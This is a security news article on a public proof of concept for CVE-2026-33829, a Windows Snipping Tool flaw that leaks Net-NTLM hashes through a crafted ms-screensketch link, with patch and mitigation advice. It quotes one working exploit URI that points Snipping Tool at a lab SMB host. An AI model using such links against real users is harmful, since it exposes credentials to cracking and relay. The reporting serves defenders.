PoC exploit released for Windows Snipping Tool NTLM hash leak vulnerability
A proof-of-concept exploit is now public for CVE-2026-33829, a Windows Snipping Tool flaw that can leak a user’s Net-NTLM hash when the victim opens a malicious link or webpage. Microsoft classifies the issue as a spoofing vulnerability in Windows Snipping Tool, while NVD describes it as exposure of sensitive information to an unauthorized actor over a network.
The attack works through the ms-screensketch protocol handler registered by affected Snipping Tool versions. Black Arrow Security says the vulnerable deep link accepts a filePath parameter, and that parameter can point to a remote SMB share, which causes Windows to initiate an authenticated SMB connection and expose the victim’s Net-NTLM response.
That makes the bug useful for phishing and internal network attacks. An attacker can wrap the malicious URI inside a webpage or HTML file, then rely on a believable pretext such as asking a user to crop an image, edit a badge photo, or review a document. Black Arrow notes that the Snipping Tool opens normally during the attack, which helps the lure look legitimate.
How the exploit works
Black Arrow’s public advisory says the vulnerable flow starts when a victim opens a crafted URI that triggers Snipping Tool through ms-screensketch. The proof of concept uses a UNC path in the filePath parameter so the app tries to load content from an attacker-controlled SMB server.
The published example looks like this:

```
ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast
```
When Snipping Tool processes that link, Windows tries to open the file over SMB and authenticates to the remote host as the logged-on user. The NTLM challenge-response captured in that exchange (the "Net-NTLM hash", NTLMv2 on current Windows, which is not the password hash itself) can be cracked offline against the user's password or relayed to another service that does not require signing, depending on the environment.
Why this matters
The vulnerability does not need code execution to become dangerous. A captured Net-NTLM response can still give attackers a useful foothold, especially in enterprise networks where NTLM authentication over SMB remains common and relay targets exist (services that do not require signing or channel binding). This is why even a CVSS 4.3 "medium" bug can matter in real phishing campaigns.
The attack also has a low barrier to entry. Black Arrow says exploitation only requires user interaction in the form of visiting a malicious page or opening a link. That makes the bug easier to fold into email lures, helpdesk scams, or fake internal document workflows.
Microsoft included CVE-2026-33829 in its April 14, 2026 security updates, and NVD lists the flaw as published the same day. Black Arrow's disclosure timeline says the issue was reported on March 23, 2026 and that the fix and the coordinated public release both landed on April 14.
At a glance
| Item | Detail |
|---|---|
| CVE | CVE-2026-33829 |
| Product | Windows Snipping Tool |
| Vulnerability type | Sensitive information exposure / spoofing over a network |
| Trigger | Malicious ms-screensketch deep link |
| Main risk | Net-NTLM hash leakage through SMB authentication |
| User interaction required | Yes |
| Patch date | April 14, 2026 |
Supported by Microsoft, NVD, and Black Arrow’s advisory.
What organizations should do now
Organizations should deploy Microsoft’s April 14, 2026 security updates on affected Windows systems as quickly as possible. Black Arrow’s recommendation is direct: install the April 14 security patches released by Microsoft.
Security teams should also watch for unexpected outbound SMB traffic to untrusted hosts. Even after patching, blocking or tightly restricting outbound SMB at the perimeter remains a strong control because it cuts off a common path for NTLM hash capture and relay setup. This is a defensive inference based on the exploit path documented by Black Arrow.
User awareness matters too. Employees should be cautious with links that trigger local Windows apps, especially when the request comes through email or chat and claims to involve images, forms, or internal documents. In this case, the fact that Snipping Tool opens normally can make the lure look harmless.
Recommended actions
- Apply Microsoft’s April 14, 2026 security update for CVE-2026-33829.
- Monitor for unusual outbound SMB connections to unknown or internet-hosted systems.
- Block outbound SMB where business needs allow.
- Warn users about malicious links that open local Windows apps such as Snipping Tool.
- Review phishing detections for HTML pages or redirects that trigger custom URI schemes. This is an inference based on the public PoC flow.
FAQ
What is CVE-2026-33829?
CVE-2026-33829 is a Windows Snipping Tool vulnerability that can expose a victim's Net-NTLM authentication response over the network when the app is triggered with a crafted deep link.
Does the attacker need anything beyond a link or webpage?
No. The public PoC shows the attack can start with a malicious URI or webpage that triggers Snipping Tool through the ms-screensketch protocol.
Is there a public proof of concept?
Yes. NVD links to Black Arrow Security's public GitHub repository for CVE-2026-33829, and that repository includes a readme and demonstration material.
Is a patch available?
Yes. Microsoft released the fix on April 14, 2026.